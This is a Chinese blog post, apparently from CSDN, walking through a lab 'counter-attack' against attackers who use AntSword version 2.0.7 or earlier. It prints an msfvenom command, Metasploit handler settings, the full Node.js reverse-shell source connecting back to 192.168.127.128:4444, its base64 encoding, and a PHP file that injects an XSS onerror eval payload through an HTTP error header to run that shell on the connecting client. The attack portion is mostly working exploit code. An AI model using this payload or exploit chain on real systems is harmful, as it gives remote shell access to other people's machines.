蚁剑反制技术

最新推荐文章于 2024-09-28 23:49:01 发布
最新推荐文章于 2024-09-28 23:49:01 发布
阅读量405 收藏
点赞数
分类专栏: 红蓝对抗 文章标签: android 网络 安全 网络安全 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuzixuan0207/article/details/131426375
版权

<= v2.0.7 版本蚁剑反制

win2008模拟攻击队主机

win7上有yxcms 192.168.127.132

kali当做攻击队vps 192.168.127.128

假设进入后台后写入webshell

此时 攻击队使用蚁剑(<=v2.07)去连接 可以连接上

与此同时 防守方 通过查看web日志发现一直访问123.php 且为蚁剑流量

蓝队准备开始反制

生成反弹shell到vps的恶意js文件

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f raw -o payload.js

防守方vps开始监听4444端口

use exploit/multi/handler
set payload nodejs/shell_reverse_tcp
set lhost 192.168.127.128
set lport 4444
run

将恶意js文件中的内容base64编码

 (function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(4444, "192.168.127.128", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); })();

IChmdW5jdGlvbigpeyB2YXIgcmVxdWlyZSA9IGdsb2JhbC5yZXF1aXJlIHx8IGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUuY29uc3RydWN0b3IuX2xvYWQ7IGlmICghcmVxdWlyZSkgcmV0dXJuOyB2YXIgY21kID0gKGdsb2JhbC5wcm9jZXNzLnBsYXRmb3JtLm1hdGNoKC9ed2luL2kpKSA/ICJjbWQiIDogIi9iaW4vc2giOyB2YXIgbmV0ID0gcmVxdWlyZSgibmV0IiksIGNwID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLCB1dGlsID0gcmVxdWlyZSgidXRpbCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCg0NDQ0LCAiMTkyLjE2OC4xMjcuMTI4IiwgZnVuY3Rpb24oKSB7IGNsaWVudC5zb2NrZXQucGlwZShzaC5zdGRpbik7IGlmICh0eXBlb2YgdXRpbC5wdW1wID09PSAidW5kZWZpbmVkIikgeyBzaC5zdGRvdXQucGlwZShjbGllbnQuc29ja2V0KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50LnNvY2tldCk7IH0gZWxzZSB7IHV0aWwucHVtcChzaC5zdGRvdXQsIGNsaWVudC5zb2NrZXQpOyB1dGlsLnB1bXAoc2guc3RkZXJyLCBjbGllbnQuc29ja2V0KTsgfSB9KTsgc29ja2V0Lm9uKCJlcnJvciIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSkoKTs=

将下面代码中的payload替换为上面的base64字符串

<?php
header("HTTP/1.1 500 Not <img src=# οnerrοr='eval(new Buffer(`payload`,`base64`).toString())'>");
?>

<?php
header("HTTP/1.1 500 Not <img src=# οnerrοr='eval(new Buffer(`IChmdW5jdGlvbigpeyB2YXIgcmVxdWlyZSA9IGdsb2JhbC5yZXF1aXJlIHx8IGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUuY29uc3RydWN0b3IuX2xvYWQ7IGlmICghcmVxdWlyZSkgcmV0dXJuOyB2YXIgY21kID0gKGdsb2JhbC5wcm9jZXNzLnBsYXRmb3JtLm1hdGNoKC9ed2luL2kpKSA/ICJjbWQiIDogIi9iaW4vc2giOyB2YXIgbmV0ID0gcmVxdWlyZSgibmV0IiksIGNwID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLCB1dGlsID0gcmVxdWlyZSgidXRpbCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCg0NDQ0LCAiMTkyLjE2OC4xMjcuMTI4IiwgZnVuY3Rpb24oKSB7IGNsaWVudC5zb2NrZXQucGlwZShzaC5zdGRpbik7IGlmICh0eXBlb2YgdXRpbC5wdW1wID09PSAidW5kZWZpbmVkIikgeyBzaC5zdGRvdXQucGlwZShjbGllbnQuc29ja2V0KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50LnNvY2tldCk7IH0gZWxzZSB7IHV0aWwucHVtcChzaC5zdGRvdXQsIGNsaWVudC5zb2NrZXQpOyB1dGlsLnB1bXAoc2guc3RkZXJyLCBjbGllbnQuc29ja2V0KTsgfSB9KTsgc29ja2V0Lm9uKCJlcnJvciIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSkoKTs=`,`base64`).toString())'>");
?>

最后将123.php文件中的内容替换为shell.php文件中的内容

替换完成后 攻击队在执行操作时 没有反应

当红队人员退出重新进入webshell后 连接不上 会报错

再看防守方vps 得到攻击队主机shell

ssp@
关注
专栏目录
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和提权示例(一)
热门推荐
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
溯源(八)之利用goby RCE 进行反制黑客
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-03 838
当然在这里我们要点击这个之后代码才会被触发,实际过程中我们需要诱导攻击者去点击这些可以交互的地方,我这里可以给大家提供一个思路,我们可以在环境中部署一个蜜罐,那蜜罐是不是会模拟很多可以攻击的服务诱导攻击者攻击,在goby扫描过程中,攻击者看到那么多的服务会不会去疯狂点击和查看扫到了些什么?当goby再扫描网站时,会去扫描网站下的目录,再根据网站目录下的文件去得到一些网站的信息,我们扫到的php服务就是根据被扫的文件得到的。所展示给我们的网站扫出来的信息都是程序写死的,这样我们很难去利用xss漏洞去反制
连接时出现问题及问题解决
最新发布
qq_52190342的博客
09-28 341
上一篇文章做文件上传时,连接时出现报错,仔细检查了地址以及密码,均无误。心想完蛋,得重安,后边百度了问题成功解决。按上图1、2、3设置,再重新测试连接,成功!注意:记得输入正确的地址以及密码哟~解决办法:(好烦,明天还得上班)
关于反制深入的分析和利用的一点小思路
m0_67105288的博客
02-21 820
前言 前几天我在公众号看到了一篇名为《端内钓鱼,反制》的文章,我觉得这个思路很好,之后决定深入研究一下,通过两天的研究,现在已经写出了比较真实的反制马。在研究的过程中把一些经验分享出来,希望可以给大家解决一下问题。 一、反制思路 首先我们知道虚拟终端遇到http/https协议头时会发生转换,这个链接打开的页面是以内部的浏览器打开的,在实现上用了node.js,之后通过打开的页面嵌入js来直接执行命令 这里松鼠A师傅的文章说的很明白了,https://mp.weixin.qq.com
溯源反制-工具反制-反制
m0_62172162的博客
04-25 305
溯源反制-工具反制-反制
关于(AntSword)的溯源反制
Welcome To Myon'Blog !
12-30 1244
如果攻击者再次连接或者进入shell,则会报错,并且反弹一个shell给我们在1971端口上,我们可以利用该shell执行命令等,甚至溯源到对方的外网ip。如果我们发现了这个shell,我们该如何反击呢?以物理机为攻击机,虚拟机kali模拟受害者,之后使用kali进行溯源反制。最开始以为是系统问题,于是全换成Windows系统测试,依旧未成功。启用kali的Apache服务,用于模拟一个对外开放的服务。(我不清楚是否是我版本的问题还是什么问题)我这里使用的版本是2.1.15的(
中国AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客
Jiuchen的博客
03-16 3692
中国(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。黑客在你的web服务上植入了WebShell,利用去连接并控制了你的电脑,这时被你发现了电脑被控制 变的卡卡的,并且发现了是通过web服务里的WebShell来控制你的,想到自己磁盘里几十G的秘密学习资料可能全部被窃取,你很不爽,你想找到这个黑客小子,绞尽脑汁想了很多办法也无法痛快的还击,直到你想起来在2023年3月16号读到的我这篇文章,你抱着试试看的态度去尝试了一下,发现
低版本反制
m0_46317063的博客
11-27 653
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
红队系列-溯源与应急反制专题
aming小老弟
11-09 549
日志分析、流量特征分析、内存马。
安全红蓝对抗反制(反捕、画像)
墨痕诉清风的博客
03-09 3707
1.蜜罐 蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。 1.1 放置高交互蜜罐 放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。 1.2 放置多个容易被发现的蜜罐 放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知道自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真
中国完整版,包含linux和windows版本
07-18
完整版antsword,包含linux和windows版本,插件市场可用 。安全人员测试利器
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
【溯源反制反制攻击者-低版本
qq_39972370的博客
08-03 690
低版本中国存在 XSS 漏洞,该漏洞是因为在 webshell 远程连接失败时,中国会返回错误信息,但因为使用的是 html 解析,导致 xss 漏洞。 所以可以在防守方部署网站,诱导攻击方上传木马文件,攻击方使用连接。防守方对木马文件进行更改,利用 nc工具获取到攻击方的shell权限。
反弹shell
weixin_43148062的博客
04-24 595
什么是反弹shell NC使用 NC正向连接 NC反向连接 bash反弹shell 一、什么是反弹shell 通常我们通过web应用某漏洞成功拿到了webshell后,接下来我们往往更像直接获得一个虚拟终端,来方便更好的做后续的渗透。 shell是操作主机的接口,反弹shell就是把shell送给别人,让其他人可以操作自己的计算机。 回到顶部 二、NC使用 NC(netcat)被称为网络...
使用出现 Error {“address“:“47.98.50.28“,“code“:“EACCES“,“errno“:“EACCES“,“port“:80,“syscall“:“connect“
weixin_43886198的博客
08-16 2210
使用出现{“address”:“127.0.0.1”,“code”:“ECONNREFUSED”,“errno”:“ECONNREFUSED”,“port”:8080,“syscall”:“connect”}
的基本使用
yuqnqi的博客
05-08 1504
我的是 “D:\LeStoreDownload\phpStudyjiayou\phpstudy_pro\WWW\site”进入webshell.top的根目录,新建.txt文档,将后缀名改为.php并写入一句话木马。开启浏览器访问木马,我的页面是出现警告信息,不是报错,因为我设置的是显示警告信息。接下打开webshell.top的根目录,测试连接成功后 点击左上角的 “添加”响应码为200,说明脚本正常运行。接下来使用连接webshell。这里正常会返回403,不要慌。打开,单击右键, 添加数据。
反求工程CAD软件:推动快速原型制造技术发展
商业化的反求工程软件如Surfacer、Imageware、Geomagic、Delcam、Cimatron和Strim等,它们通过集成计算机辅助设计(CAD)、逆向工程(Reverse Engineering, RE)、快速成形(Rapid Prototyping, RP 或 Rapid ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值